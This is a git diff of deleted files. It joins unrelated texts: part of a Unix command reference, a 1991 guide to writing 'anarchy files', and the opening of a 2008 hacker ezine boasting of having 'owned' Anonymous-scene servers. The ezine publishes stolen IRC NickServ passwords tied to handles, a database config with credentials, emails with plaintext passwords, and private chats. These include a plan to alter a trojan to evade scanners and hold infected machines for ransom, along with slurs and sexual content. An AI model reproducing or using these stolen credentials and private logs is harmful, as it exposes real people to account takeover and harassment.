- The [ps] command, by itself, displays the status of each active
- process controlled by your terminal. This status report includes
- the Process Identification Number (PID), the terminal (TTY), the
- time the process has been executing (TIME), and the command line
- used to execute the process (CMD).
- [ps]'s three options include -a (displays info. on active processes
- controlled by any terminal), -x (info. on ALL active processes), and
- -l (an extensive status report on all active processes).
- pwd
- ~~~
- [pwd] command displays the present working directory.
- rm filename
- ~~~~~~~~~~~
- [rm] removes a file. More than one file can be specified.
- rmdir directoryname
- ~~~~~~~~~~~~~~~~~~~
- This utility removes a directory, an EMPTY directory (save the
- hidden files).
- sleep seconds
- ~~~~~~~~~~~~~
- The [sleep] utility causes a process to become inactive for a
- certain period of time. Max. seconds is 65,536 (about 18 hrs).
- sort -options filenames
- ~~~~~~~~~~~~~~~~~~~~~~~
- [sort] merges and sorts files. Without options, [sort] orders
- files by the ASCII codes of the characters at the beginning
- of each line. Options include -b (leading blanks ignored), -d
- (only letters, digs, and blanks considered; "dictionary sort"),
- -f (case ignored), -n (numerical sort [for numerical data]), and
- -r (a reverse sort).
- split -size original resulting
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- [split] divides a large file into smaller ones. [size] refers to
- the number of lines the resulting files contain, [original] is
- the name of the orig. file, and [resulting] represents the
- prefix name assigned to the newly created files.
- umask ugo
- ~~~~~~~~~
- [umask] changes the file CREATION mask (see [chmod] for already
- existing files). Here, [u] represents the owner's access
- permission, [g] the group's a.p., and [o] the a.p. for all others.
- [uucp] (UNIX to UNIX copy) can be used to send files to a
- remote UNIX, or retrieve files from the remote system.
- Other UNIX comm commands include [cu] (which establishes contact
- with another system), and [uux] (UNIX to UNIX execute; allows
- commands to be executed on a remote system).
- wc -options filenames
- ~~~~~~~~~~~~~~~~~~~~~
- The [wc] utility displays file-size information. This includes
- the number of lines, words, and characters. By chosing the
- -l, -w, or -c options, the information can be limited to only
- line, word, or character number.
- who
- ~~~
- A very useful command (which some systems respond to even before
- a user is actually logged on), [who] displays a list of users
- currently online. This list includes the user's name, terminal
- device # (tty), and the log-in time. [who am i] displays info.
- only on the user who executed the command.
- \ No newline at end of file
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-12/02/91 03:54am
-Written By The Freddy
-In Association With The National Network of Anarchists and Nihilists (NNAN)
- Have you seen the number of shitty anarchy files out there? It's
-pathetic the way some idiots try to write files. I wrote this to give
-those people and first time writers pointers on how to correctly write a
-This document was intended for informational purposes ONLY, the author and
-the National Network of Anarchists and Nihilists do not endorse or support
-any illegal action presented here or in any other documents which we
-release. The only motivation for the writing of this document is purely
-for educating the general public. The author and the National Network of
-Anarchists and Nihilists will not be held responsible for any actions by
-the reader of this document.
-Construction of a Good Anarchy File
- There are many things to remember when writing a file. Here are
-some pointers:
- 1) Always have the date and time at the beginning of the file like
- I have done. This is the most important part of any anarchy
- file because some material is time-sensitive and it is also nice
- to know how out-dated a file is. A good example of this is the
- Jolly Roger Cookbook. A very nicely written piece, however
- there was no indication of when it was written. Most of the
- sources to obtain slim jims, lock picks, etc. were out of
- business by the time I first got hold of it.
- 2) Always use ASCII. Not ANSI but ASCII. This is for several
- reasons. One is that some viewers, word processors, etc. do not
- or cannot support the extended characters. The same holds true
- for several types of printers. Second, I have what seems like
- millions of files that were written on Word Perfect, Word Star,
- Multimate, MS Word, etc. Most people don't have these editors
- or viewers. I remember it took me two weeks to convert the
- Terrorist's Cookbook to ASCII from the WP format so I could
- print it. And finally, ASCII files are smaller and there are
- several ASCII only editors that have all the same functions of
- expensive word processors. I personally use MULTI-EDIT V3.00b.
- Call your local 10 gig public domain board and you will find it
- or some other qualified ASCII text editor.
- 3) As a rule of thumb, set margins for 75 characters and never go
- beyond that. As mentioned before, a good ASCII editor will let
- you set up margins. This is mainly for printers. You may or
- may not believe it, but 90% of all anarchists print up files for
- easy reference. And some files have really strange margins. I
- once found a file with the right margin at column 100.
- 4) It is perfectly all right to FUCKIN' cuss in a file. It is also
- semi-acceptable(but lame) to say PHUCK, FONE, etc.; but never
- ever write like this:
- "so you want to be an anarchist? all ya gotta do is learn how to
- rebel and denounce all government laterz"
- Slang is okay, but learn to spell and for God's sake use proper
- punctuation and capitalization.
- 5) If you are going to include a diagram, schematic, or whatever,
- try not to do it yourself with ASCII characters if at all
- possible, unless you are good at it. Get someone else to do
- it for you. Very few people can draw a good ASCII schematic.
- If possible include two of each diagram or schematic. One in
- the text and one in ANSI format or .gif format. There are many
- draw programs out there. Also it's nice to find a self-loader
- for your .gif's. Keep the ASCII diagrams, as they will do in a
- pinch and not everyone can printout .gif files. ANSI is nice
- and all, but, generally, it should be avoided.
- 6) Do or have done what you are writing about. I once saw a file
- that scared me a bit. Here is part of it:
- "now that theoretically should be the right ratio. I dunno. Tell
- me if this works."
- Now if you don't know what the fuck you're writing about, then
- don't write about it. That simple. Also don't alter files. I
- once found a file where someone altered the ratios for nitro.
- Not to nice. If you've done it before, please don't. We don't
- need assholes like you.
- 7) You should have a good equipment, chemical, parts, or whatever
- list. It should also be complete. Like for instance a file
- construction of a olive box should tell you that:
- "Quantity Item Source
- -------- ---- ------
- 1 Small plastic box Radio Shack (R.S.270-224)
- 1 1" x 2" perboard Radio Shack (R.S.276-1395)"
- I don't know how many times I've seen files which tell you what
- to get but not specifically. Like:
- "get some resistors and 2 capacitors"
- Now if this author knew anything about electronics, he would
- have known that you need the specific voltages or whatever. Be
- specific.
- 8) Also remember, don't use tabs. People have tabs set up for
- different spaces. You get some pretty strange stuff sometimes.
- For instance someone might have tab set at 9 characters and you
- have it a 8 characters. There are also many printers that use
- funny tab spacings. When you try to view or print these files,
- you get stuff like:
- "**************************************************************
- * How to Make Your Very Own Home-Made Tennis Ball Launcher *
- * by *
- * The Stupid Anarchist *
- * *
- **************************************************************"
- Always use the space bar to indent.
- 9) A disclamer is also important. Even though you don't think so,
- your handle doesn't conceal your identity. The police, FBI,
- sectret service, or any other government agency(not to mention
- Ma Bell) has both the time and the resources to get you nailed
- if they feel like. Don't laugh at this point. It could save
- your life. Or maybe 20 years of it.
- Well, I hope this file will better the quality of the files out
-there. I can be reached at The DeaTh BoX BBS--(714)970-6710--which is the
-home of NNAN. Well, it's getting late so until next time, adieu.
-12/02/91 04:43am
diff --git a/.md/thoughts/txt/ b/.md/thoughts/txt/
deleted file mode 100644
index 0274f3b..0000000
--- a/.md/thoughts/txt/
+++ /dev/null
@@ -1,16853 +0,0 @@
- _/_/_/_/_/ 444444444 ~~~~~~
- _/ _/_/ _/ _/_/ _/_/ 4;;;;;;;;4 Internet Superheroes ~
- _/ _/_/_/_/ _/_/ _/ _/ 4;;;;;;;;;4
- _/ _/ _/ _/ _/ 4;;;;44;;;;4 With great power
-_/_/_/_/_/ _/_/_/ _/ _/_/ 4;;;;4 4;;;;4 comes great responsibility.
- 4;;;;4 4;;;;4
- .` .` .`.` 4;;;;4 4;;;;4 And great babes.
- -+;//. `;/;/- 4;;;;444444;;;;444
- -++%+. `/+/+-` 4;;;;;;;;;;;;;;;;4
- -o%/o; -++/+;` 4444444444;;;;;444 ______ __
- .+0%+o- `/+;/+- 4;;;;4 | |.--.--.--.-----.-----.--| |
- /0%-oo;`` `+o;;o/` 4;;;;4 | -- || | | | | -__| _ |
- `+0/.+ossoo+/.`` ` `;//+++oo-.++- 444444 |______||________|__|__|_____|_____|
- -0%;`-/++ooooo+o/++oossso++/`.oo;
- -0%oossssssssssssssssyssssso+oss/ -- Table of 0wned --
- -/0o/-/syyyyyyyyyyyyyyyo;;/oso/`
- ``;yhyyhhhydddddyyhhyhy/` ` 1. Anonymous
- -ohhs//dmy/ymmmmmy;omdo+yho-` 2. g00ns
--symmho;` /Nm+.sNNNNmo.;mm+``;sddo//` 3. illmob
-oNNdo-` +Nd; ;NNNNh; .dNo` `-odNd; 4. Safety on the Internet
-oMm+` oNy- `sNNmo` `hNs. /mm/` 5. Robert Lemos
-/Nd; +Ns. -hds. `sNs. .dm/` 6. The Fed Jingle; +No` ..` `sNs. `dd/ 7. Comodo
-`om; ;ms. `yNo` .mh- 8. CF0
- .do` .dy- `hd/ ;mo` 9. Blackcode
- ;y- `+m; .ms. `yy; 10. Trivia Security
- `/+` .ho` +h/ ;y/` 11. Pwnie Awards
- `-. ;d; .h+` ;;` 12. The Cult of the Dead Cow
- ` `;/` `oo. `` 13. Pwnee Awards
- S y m a n t i c - T h r e a t C o n
- ---------------------------------------------
- | Level 6: # rm -rf /* |
- | (//////////////////////////////////////6) |
- ---t h i s o n e g o e s u p t o s i x---^---
-At last the 2008 show! The torch-song no-one ever sings! The curfew chorus line!
-The comedy divine! The bulging eyes of puppets, strangled by their strings.
-There's thrills and chills and girls galore, there's sing-songs and surprises!
-There's something here for everyone, reserve your seat today!
-We're happy to be have you back. Do we ever have some treats! We have some sweet
-articles. We rm'ed g00ns, we took a successful forray into Anonymous' world, we
-conquered and destroyed Blackcode, and, of course, we have the Cult of the Dead Cow
-owned and exposed. We top those off with lots of fun little owns and articles. Kick
-up your feet and settle in, this is going to take all night.
-zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0
-zf0 zf0
-zf0 Anonymous zf0
-zf0 zf0
-zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0
-* We owned Anonymous. Although they sell you the idea that they cannot be owned
-* because they lack any structure, we owned anybody and anything involved that we
-* wanted to. They had a quote about being unable to kill a dragon with no head. We
-* just watch the dragon stumble around drunkenly and then we stab all its toes.
-* We owned inky_'s main server, we owned, we owned a lot of people
-* and sites that were not worth including in this article. The anon scene is massive
-* and we owned whatever we wanted, and brought owns and lulz here for you. They get
-* a lot of press and talk a lot of shit (fucking annoying ED pages too), but all
-* they really are is the *chan community rebranded (currently) around the idea of
-* destroying the CoS. ^ban^ basically says that if you are a channer, you're anon,
-* and if you aren't, you aren't.
-* A lot of the top guys have no respect for the morons dedicated to their cause,
-* and don't mind abusing or misleading them (to which they so easily follow). They
-* don't mind money either, as we will demonstrate. Something stinks about this, it
-* reminds me of *something*, if only I could remember what...
-* The most talented people in Anonymous hack Scientology people. Think about that.
-* In the hacking world, that places them below the people who hacked
-* and above the people who DoS
-* We could be dropping your names, addresses, and email addresses, but you're kids,
-* we do have some mercy.
-* On with the show!
-// Hey it's that guy who tried to take over 4chan. Check out his IRC problems!
-Xyrix -> REGISTER 01110
-Xyrix -> REGISTER Xyrix A1B2C
-Xyrix -> REGISTER Xyrix A1B2C3
-Xyrix -> REGISTER Xyrix c0ncr3t3456
-Xyrix -> REGISTER Xyrix lolol
-Xyrix -> REGISTER Xyrix maniclol
-Xyrix -> REGISTER help
-Speaking of which, it looks like we got a fan after rming g00ns:
-From: X Y <>
-Date: Thu, 08 May 2008 19:03:20 +0100
-This message is not encrypted, and is not digitally signed by .
-Hey, I was just wondering where you guys hung out normally. Irc or on silc?
-// Some select passes, starting with the [nig] bitches
-[nig]A_Non_E_Moose_ -> IDENTIFY qrrbrbirlbel
-[nig]Azure -> identify niceguyjin
-[nig]Azure -> identify nigguyjin
-[nig]Banhammer -> identify letmein
-[nig]CircleK -> nickserv: register bullpass1
-[nig]Dart27 -> register midnight3
-[nig]Dravas -> nickserv: identify x8i9j9w
-[nig]Kazimir -> nickserv: identify wood.lake
-[nig]Moose -> identify qrrbrbirlbel
-[nig]Picatta -> NickServ: IDENTIFY lolcats8295
-[nig]Skorski -> nickserv: identify internethate
-[nig]Spaise -> nickserv: identify 198956spaise
-[nig]Tycho -> NickServ: IDENTIFY auli711
-[nig]banhammer -> identify letmein
-[nig]brambi -> NickServ: IDENTIFY exodus
-[nig]codenaur -> nickserv: REGISTER bobbin
-[nig]kando -> nickserv: identify qwerty
-[nig]kando -> nickserv: identify qwertyui
-[nig]msgmcmuffin -> nickserv: identify haX0rm3plz
-[nig]neG -> nickserv: identify fucktits
-[nig]shamrock -> identify jimmy123
-[nig]spic -> nickserv: identify alphabette
-[nig]squid -> nickserv: identify w00tah
-// Some other passes of (mostly) relevant people in the anon scene
-inky_ -> nickserv: identify jblink
-Alyosha -> nickserv: identify CLEVERPASSWD1111
-RickRollington -> nickserv: identify muddymuddykipz
-Rorschach -> IDENTIFY saltywalrus
-Tycho -> NickServ: IDENTIFY auli711
-negroe -> nickserv: ghost TheShining jewslol
-negroe -> nickserv: identify aspadmd1
-Kerx -> NickServ: identify hit13r
-Freeze` -> identify wtfuxsucks
-SpunkWang -> NickServ: IDENTIFY SpunkWang!
-trypta -> nickserv: identify moveon
-Nihilanth -> nickserv: identify bper231a
-Skorski -> ghost Deltantor slowpoke
-Muhu -> IDENTIFY niggershit7
-Fail-chan -> identify cocks123
-Delacroix -> nickserv: id lulzy1
-f0rked -> id holyshit
-_meh_ -> NICKSERV: IDENTIFY iamroot
-innocuous -> nickserv: identify thepassword.
-innocuous -> nickserv: identify thenickpassword.
-innocuous -> nickserv: identify thenickpass.
-Ms_Mister -> identify farkman
-trapnest -> nickserv: identify aichii32
-DrMengele -> NickServ: identify mofo47
-bittwist -> identify sun42
-Spaise -> nickserv: identify 1898956spaise
-nfinity0 -> NickServ: identify bluemonkey66
-infinity0 -> NickServ: register Ivy saturation6666
-Cobrian -> Nickserv: identify Amiga32
-cheezmasta_ -> IDENTIFY iamthecheese101
-denvetta -> NickServ: IDENTIFY madman01
-codenaur -> nickserv: IDENTIFY thaergaerg
-codenaur -> nickserv: identify bobbin
-codenaur -> nickserv: identify ilovecock // We can't make this shit up
-RickRollington -> chanserv: identify #insurgency h875n8w45h89
-* Let's start it off with #el/i/tes
-^ban^ -> #el/i/tes: We are True Anonymous.
-// And we are watching.
-// ^ban^ is one of the big names in anonymous.. "old anon".. check out his
-brilliant ideas!
-^ban^ -> #el/i/tes: well, a suggestion for a board name
-^ban^ -> #el/i/tes: I don't suggest we model after said board though
-^ban^ -> #el/i/tes:
-^ban^ -> #el/i/tes: The Elitist Superstructure of DQN
-^ban^ -> #el/i/tes: (The Elitist Superstructure of TPN you might recognize,
-// ^ban^ had his docs dropped already, big drama
-// And we finally know what old anon care about - money
-Kerx -> #el/i/tes: So we're not gonna sit on asses and have yet another person
-run our wiki and have him profit of us
-Kerx -> #el/i/tes: time once and for all to buy own server and do our shit on
-it and rent out space to make teh money
-Freeze` -> #el/i/tes: and how would that work
-Freeze` -> #el/i/tes: I'm all eyes here
-Kerx -> #el/i/tes: just how the guy running anonhost is doing his
-Kerx -> #el/i/tes: and we've got an easy way to secure money with the xenu
-Kerx -> #el/i/tes: make sure we have some true reps for the wiki go out and
-collect in person also on next raid
-// More money
-Kerx -> #el/i/tes: ^ban^ we already has a way to get a ton of dough
-// More money
-Picatta -> #el/i/tes: and we're putting a couple ads on it
-// More money
-Picatta -> #el/i/tes: We could do a proxy list and put ads on it
-// They are masters of technology and contemporary security issues
-TheShining -> #el/i/tes: but we can't tell anyone
-TheShining -> #el/i/tes: outside of this room
-TheShining -> #el/i/tes: i was thinking about us getting a trojan
-TheShining -> #el/i/tes: but modifying it
-TheShining -> #el/i/tes: completely
-TheShining -> #el/i/tes: until everything is changed to that virus scanners
-wont pick it up
-TheShining -> #el/i/tes: and distribute it to as many computers as possible
-TheShining -> #el/i/tes: and take as much personal information as possible
-TheShining -> #el/i/tes: and or hold the computers for ransom
-Freeze` -> #el/i/tes: hmm
-Freeze` -> #el/i/tes: if you could really do that
-Freeze` -> #el/i/tes: I'd help out
-TheShining -> #el/i/tes: the hardest part is to re-do the code on the trojan
-TheShining -> #el/i/tes: and we'd also have to keep this secret until we had at
-least 10,000 zombies
-// omg anonymous revealed
-031811:fuckingfruit -> #el/i/tes: he's waiting for kakama (the leader of
-anonymous) to decide if to delete a wiki page or not
-// Kakama's site and yahoo phish page:
-// The illustrious ^ban^ explains that anon aren't hackers, they're channers,
-and if you're not a channer, you're not anon
-clorox -> ^ban^: you have alot of enemies...i am one of them
-clorox -> ^ban^: you were a faggot when we first came here to me
-^ban^ -> clorox: there's a pretty simple explanation for that, you know
-^ban^ -> clorox: I was here when partyvan was founded, and didn't like the idea
-of it abandoning the entire idea for it's founding :|
-^ban^ -> clorox: The original idea was to have a network for anon, by anon, and
-only anon
-clorox -> ^ban^: what makes you anon
-^ban^ -> clorox: but things didn't happen that way
-^ban^ -> clorox: by anon I mean anyone from the *chan culture
-* Who wants to read the private chats of 711staff?
-// I beg to differ
-jewlion -> #711staff: this is your only warning
-jewlion -> #711staff: what happens in here
-jewlion -> #711staff: stays in here
-// Ego
-lolihaetfire -> #711staff: Actually, christ, who are our other admins?
-inky_ -> #711staff: ^Bi am the other admin
-lolihaetfire -> #711staff: danke
-inky_ -> #711staff: why the hell does nobody acknowledge me
-inky_ -> #711staff: they're always like 'jewlion this' 'jewlion that'
-inky_ -> #711staff: if it wasn't for me this site wouldn't even exist
-// And rank
-syense -> #711staff: we sure will miss jewlion though.
-Kakama -> #711staff: WHAT
-Kakama -> #711staff: HUH?
-Kakama -> #711staff: JEWLION GO WHERE?
-syense -> #711staff: he has stepped down.
-syense -> #711staff: hes getting marrieda
-DaftWally -> #711staff: I assumed inky_ would take over
-syense -> #711staff: well he will
-[nig]Dravas -> #711staff: lol
-syense -> #711staff: hell be primary, with necro as second, and me as third
-DaftWally -> #711staff: can I be 4th? :3
-[nig]Dravas -> #711staff: can i be 5th :3
-syense -> #711staff: daftwally will probably be 4th
-// And more rank
-jewlion -> #711staff: if the site goes down
-jewlion -> #711staff: you'll have to be the one to take care of shit
-jewlion -> #711staff: Necrobilly and MisterCow are the only one's I'd trust
-with the site rite nao :|
-jewlion -> #711staff: but MisterCow isn't here
-// They're all about the money, too
-UnknownUser -> #711staff: I have a great idea
-UnknownUser -> #711staff: we could sell account levels
-UnknownUser -> #711staff: like say a platnum acount gets you unlimited access
-to all pictures
-[nig]ItsNotLupus -> #711staff: syense: wat
-UnknownUser -> #711staff: where as a normal account you can only look at 5 pics
-in a min
-// Money can buy you status
-jewlion -> #711staff: I gave admin to those who donated
-jewlion -> #711staff: and have been mods forever
-Dart27 -> #711staff: I was an accident. My mom said, "the ONE time me and your
-father had sex I got pregnant"
-Dart27 -> #711staff: Anyways, I've only made one thing in PHP.
-Dart27 -> #711staff: But it is cool.
-Tycho -> #711staff: why are you so hard over her anony
-anony -> #711staff: because i want my cock in her ass this summer
-Tycho -> #711staff: be sure to get vids
-anony -> #711staff: lewl
-NotDaftWally -> #711staff: yeah
-anony -> #711staff: i copy+pasted that to her :3
-anony -> #711staff: on msn
-Tycho -> #711staff: i fucking hate you anony
-anony -> #711staff: KStrebchuk. Hey Shyra: Yes there is need to miss you
- (7802934048) says:
-anony -> #711staff: LOLOLOLOLOLOLOLOLOL
-anony -> #711staff: Phill says:
-anony -> #711staff: we're so having buttsex.
-anony -> #711staff: KStrebchuk. Hey Shyra: Yes there is need to miss you
- (7802934048) says:
-anony -> #711staff: No anal. Last time I tried anal I cried.
-lulzwhut -> #711staff: so
-lulzwhut -> #711staff: syense is like actually dead
-[nig]jewlion -> #711staff: yeah
-ECB -> #711staff: wut happened
-[nig]jewlion -> #711staff: fluid leak
-[nig]jewlion -> #711staff: in his car
-[nig]jewlion -> #711staff: dunno wat
-ECB -> #711staff: so i get his o:line?!?!
-[nig]jewlion -> #711staff: but it caused him to hit a semi
-Tycho -> #711staff: <Necrobilly> I shoulda backed everything up
-Tycho -> #711staff: AND HER BACK ARCHES
-Tycho -> #711staff: THAT IS FUCKING HOT
-Howler -> #711staff: guys can do that too
-// 711staff paypal. Word to the wise: disable it
-Dravas -> #711staff:
-inky_ -> #711staff: apu and aero are what host 711
-anony -> #711staff: it felt like i stole keri from you
-anony -> #711staff: so I stopped talking to her
-andy -> #711staff: uh
-andy -> #711staff: lost stole her
-andy -> #711staff: from all of you
-* There's this "blackops" group that tried to be something, but they just
-generate humour
-MDK -> #blackops: yeh we need a pw thats easy to remember
-Spaise -> #blackops: umm what about
-Spaise -> #blackops: opsareblack
-Spaise -> #blackops: anything else we neeD?
-Spaise -> #blackops: ummm
-Spaise -> #blackops: flood protection
-MDK -> #blackops: how do you change the topic with this script?
-carbonlesz -> #blackops: ... Damnit, MDK. Stop capitalizing random letters of
-words in passwords.
-// He means the IRC channel mode
-Spaise -> #blackops: hmm cant have private set if its secret
-Spaise -> #blackops: grr
-carbonlesz -> #blackops: I should probably use a proxy.
-* The guys running the wiki are incompetent
-f0rked -> #wiki: oh, I thought it was ddosed or something
-denvetta -> #wiki: picatta's away somewhere
-denvetta -> #wiki: Well.. that's possible... but picatta assures me that the
-server is ddos proof
-infinity0 -> #wiki: WedTM: NO. nothing was hacked
-infinity0 -> #wiki: it was just an exploit in the mediawiki software
-Picatta -> #wiki: OH ASHI-
-Picatta -> #wiki: DHIT
-Picatta -> #wiki: /var is full
-Apon71 -> #wiki: Big problems with nameserver?
-Picatta -> #wiki: yes
-Apon71 -> #wiki: Ok, I trust you guys will fix it as always
-Apon71 -> #wiki: I've been away for a week, and am trying to catch up on what's
-Picatta -> #wiki: I can't really do shit until wedtm gets back
-Apon71 -> #wiki: Either the wiki got hacked
-Apon71 -> #wiki: Or one of you is trying to scare away newfags
-Ivy -> #wiki: Apon71: yeah it's someone trying to scare away newfags, i'm
-guessing Kakama, sigh
-januszeal -> #wiki: why is the wiki down
-januszeal -> #wiki: in before, after, and during slowpoke
-Picatta -> #wiki: well
-a-n-o-n -> #wiki: wtf...
-a-n-o-n -> #wiki: wiki down?
-Kakama -> #wiki: ATTENTION SHOPPERS
-infinity0 -> #wiki: Picatta: wiki down again... we should split up the SQL
-server vs. the webserver again
-denvetta -> #wiki: wiki down
-denvetta -> #wiki: can someone add it to /topi?
-// They actually had the most successful individual security strategy we came
-// across - the wiki was down for the majority of the time we had it owned.
-// Made it a big pain in the ass and mostly we didn't bother.
-* #anti includes people behind ED. We were hoping oclet would be passing 0day
-* around, but the only thing he has or passes is drugs. He's mostly a failure
-* at this hacker thing but wins at lulz.
-Talldog -> #anti: Having seen a woman be fucked by a horse, my pants feel
-strangely empty
-hep -> #anti: i saw women getting fucked by horses when i was still bbsing
-oclet -> #anti: ive seen .millions of girls getting fucked by horses just on
-sabotage -> #anti: i miss tacos
-sabotage -> #anti: i banged tacos like 10 times too
-Shortcat -> #anti: what happen
-oclet -> #anti: me2
-sabotage -> #anti: i think she was on top and i started to cum
-oclet -> #anti: lets gang bang her
-sabotage -> #anti: and i threw her off
-oclet -> #anti: i searched facebook with my last name
-oclet -> #anti: theres a lotof bitches i might be related to who are bangin
-hep -> #anti: i am a one dick kind of girl
-hep -> #anti: having a vagina does not entitle you to autorespect
-// Just imagine more of the above, that's 100% of their conversations
-* And basically everyone else in the community is a joker. Here are some random
-* quotes
-paraphren -> _Shinigami_: Think she's hot?
-_Shinigami_ -> paraphren: fuck yes
-paraphren -> _Shinigami_: She's 18. Want a chance to fuck her?
-_Shinigami_ -> paraphren: yes pls
-paraphren -> _Shinigami_: heh
-_Shinigami_ -> paraphren: lol
-paraphren -> _Shinigami_: Well, first thing... don't mention any of this to
-_Shinigami_ -> paraphren: k
-paraphren -> _Shinigami_: I will quite literally have to kill you. heh
-_Shinigami_ -> paraphren: lol k
-paraphren -> _Shinigami_: Secondly... I have to talk her into it. She's coming
-to Toronto to fuck me and wants to film it and shit, but I can let you have a
-go at her if you want. heh
-paraphren -> _Shinigami_: Anyway, she's a dirty girl and I'll probably be in
-the room too. So hope you're up for it. :p
-_Shinigami_ -> paraphren: lol, sounds fine to me
-_Shinigami_ -> paraphren: i can be the videographer if you want
-paraphren -> _Shinigami_: Seriously though... very important you tell NOBODY.
-CuNt -> Eric: w/e dude i do have a life other than computers
-CuNt -> Eric: and i guarentee its a shit load better than yours
-Eric -> CuNt: *rollseyes*
-Eric -> CuNt: sureeeee buddy
-CuNt -> Eric: sureeee buddy
-Eric -> CuNt: I make more in a week then u do in a year
-CuNt -> Eric: what do u make then dude
-Eric -> CuNt: I bang more chicks in a month that u ever will
-d0ct0r -> Eric: how did you join a haxs' group.
-Eric -> d0ct0r: obviously I knew me shit
-Eric -> d0ct0r: perl, vb, c, the basics
-Agent_Riding -> #Philadelphia: so gnome is like the explorer.exe of ubuntu
-TurbUlated -> anon080: <- sortofwant
-anon080 -> TurbUlated: oh.
-anon080 -> TurbUlated: your secret is safe
-mattheas -> #fallout: How do I add people
-mattheas -> #fallout: what's the command
-anon64 -> #fallout: /invite
-srgrnr -> #fallout: i want to go back to high school
-srgrnr -> #fallout: where i had friends.
-anon64 -> #fallout: high school was gay
-srgrnr -> #fallout: i had friends, dude.
-srgrnr -> #fallout: HOW THE FUCK
-srgrnr -> #fallout: DO I UNIGNORE SOMEONE
-srgrnr -> #fallout: ON IRC
-Phist -> #illmob: Spyd3r: jewlion is one of the top submitters on darknet
-Phist -> #illmob: 16 year old anon- turned compsec ethic expert
-Eugene -> HetGezicht: I don't have skills for ddos
-skinless -> Consumerwhore: feel like giving me a short explanation of how to
-get into a site?
-skinless -> Consumerwhore: i have php python and perl
-kayla -> codenaur:
-kayla -> codenaur: memcpy is a function
-codenaur -> kayla: ah
-codenaur -> kayla: :D
-codenaur -> kayla: Thanks <3
-// Shit this isn't very anonymous
-barbanon -> #socal: Gregg Hagglund up in Canada has been tagged as the leader
-QED|Pi -> Machine-Gunner: I'll just say they're for Stephen.A
-Machine-Gunner -> QED|Pi: oh fuck
-Machine-Gunner -> QED|Pi: :P
-QED|Pi -> Machine-Gunner: Nice..
-Machine-Gunner -> QED|Pi: Fuuuuuck
-Machine-Gunner -> QED|Pi: How did you know
-QED|Pi -> Machine-Gunner: it's your ident
-QED|Pi -> Machine-Gunner:
-// We owned this. It's between "Not worth mentioning" and "Not worth its own
-// section", so we drop it here
-define(SQLHOST, ''); //MySQL server address, usually
-define(SQLUSER, 'img'); //MySQL user (must be changed)
-define(SQLPASS, '3ecaa923-4c0e-4526-9f44-c8a437d88bb5'); //MySQL
-user's password (must be changed)
-define(SQLDB, 'img'); //Database used by image board
-define(ADMIN_PASS, 'fgt'); //Janitor password (CHANGE THIS YO)
-// BANG ON - Give this guy a medal and put him in charge (except he's not dumb
-// enough to accept responsibility for this crap shoot)
-Orakio -> #programming: Anonymous = mostly idiots.
-Orakio -> #programming: Don't work directly with them.
-Orakio -> #programming: It's better to linger on the edges, find a good
-Orakio -> #programming: I mean I hate scientology and I don't need to be in
-some group called anonymous to express that hate.
-Orakio -> #programming: Especially when they can't even renew their domain
-Orakio -> #programming: It's a liability to be too closely intergrated.
-// He has a 30-character nickserv password. No joke.
-GaiaKB -> #privateprivategaia: ServicesUp|Sun Mar 30 04:05:51 EDT 2008|~! Do
-NOT talk about #privateprivategaia
-GaiaKB -> #privateprivategaia: Something|Sun Mar 30 04:09:59 EDT 2008|~!
-Everything discussed here, stays here
-// ZF0 has magic powers that can read your conversations even (yes, even!!) if
-// you're using SSL!
-ian -> #spk: i pasted that in spk
-ian -> #spk: he cant know that
-ian -> #spk: i use ssl
-* Picatta's spools took up a lot of space, so here's just some mails clean and
-* clear
-Dear Hitlerlol,
-Thank you for registering at the Megadeth Forums. Before we can activate your
-account one last step must be taken to complete your registration.
-Please note - you must complete this last step to become a registered member.
-You will only need to visit this url once to activate your account.
-To complete your registration, please visit this url:
->America Online Users Please Visit Here to be Activated</a>
-**** Does The Above URL Not Work? ****
-If the above url does not work, please use your Web browser to go to:
-Please be sure not to add extra spaces. You will need to type in your username
-and activation number on the page that appears when you visit the url.
-Your Username is: Hitlerlol
-Your Activation ID is: 27200622
-If you are still having problems signing up please contact a member of our
-support staff at
-All the best,
-Megadeth Forums
-You have requested to register the following nickname Picatta.
-Please type " /msg NickServ confirm u95oIIpO3 " to complete registration.
-If you don't know why this mail was sent to you, please ignore it silently.
-Rizon administrators.
-Dear Picatta,
-Thank you for registering at Before we can activate
-your account one last step must be taken to complete your
-Please note - you must complete this last step to become a registered
-member. You will only need to visit this url once to activate your
-To complete your registration, please visit this url:
-php?a=3Dact&amp;u=3D13453212&amp;i=3D=" 72598583="">America
-Online Users Please Visit Here to be Activated</a>
-**** Does The Above URL Not Work? ****
-If the above url does not work, please use your Web browser to go to:
-Please be sure to type it exactly as it appears. You will need to type
-in your Username and Activation ID on the page that appears when you
-visit the url.
-Your Username is: Picatta
-Your Activation ID is: 72598583
-If you are still having problems signing up please contact a member of
-our support staff at
-All the best,
-Welcome to forum.i2p Forums
-Please keep this email for your records. Your account information is as
-Username: Picatta
-Password: lolcats8295
-Please do not forget your password as it has been encrypted in our database and
-we cannot retrieve it for you. However, should you forget your password you can
-request a new one which will be activated in the same way as this account.
-Thank you for registering.
-Welcome to Operation Clambake Message Board Forums
-Please keep this email for your records. Your account information is as
-Username: Picatta
-Password: loldongs
-Your account is currently inactive, the administrator of the board will need to
-activate it before you can log in. You will receive another email when this has
-Please do not forget your password as it has been encrypted in our database and
-we cannot retrieve it for you. However, should you forget your password you can
-request a new one which will be activated in the same way as this account.
-Thank you for registering.
-Welcome to Forums
-Please keep this email for your records. Your account information is as f=
-Username: Picatta
-Password: 86500144
-Your account is currently inactive. You cannot use it until you visit the=
- following link:
-* Now let's get to the box pwning. This is inky's server that hosts a handful
-of their shitty sites
-drwxr-xr-x 4 root wheel 512 Feb 14 03:05
-drwxr-xr-x 4 root wheel 512 Feb 6 07:03
-drwxr-xr-x 4 httpd httpd 512 Jan 26 09:24
-drwxr-xr-x 4 root wheel 512 Feb 1 15:41
-drwxr-xr-x 4 root wheel 512 Feb 19 01:42
-drwxr-xr-x 4 root wheel 512 Feb 7 06:53
-drwxr-xr-x 4 root wheel 512 Mar 7 15:13
-drwxr-xr-x 4 root wheel 512 Feb 19 19:15
-drwxr-xr-x 4 root wheel 512 Mar 11 04:13
